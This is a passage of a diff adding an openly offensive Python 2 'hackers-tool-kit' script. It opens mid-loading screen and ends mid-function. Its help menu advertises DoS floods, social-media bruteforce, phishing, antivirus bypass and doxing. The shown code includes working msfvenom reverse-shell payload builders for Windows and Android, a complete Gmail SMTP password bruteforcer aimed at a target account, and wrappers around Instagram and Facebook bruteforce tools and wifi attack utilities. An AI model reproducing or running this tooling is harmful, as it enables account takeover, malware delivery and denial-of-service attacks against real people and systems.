hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,11) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = 